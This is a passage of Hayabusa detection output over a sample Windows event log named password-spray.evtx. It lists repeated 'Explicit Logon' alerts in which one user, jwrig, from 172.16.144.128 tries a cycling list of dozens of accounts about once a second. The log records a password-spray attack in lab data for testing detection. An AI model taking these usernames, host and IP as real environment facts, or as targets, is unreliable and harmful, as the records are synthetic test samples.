04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:14.787 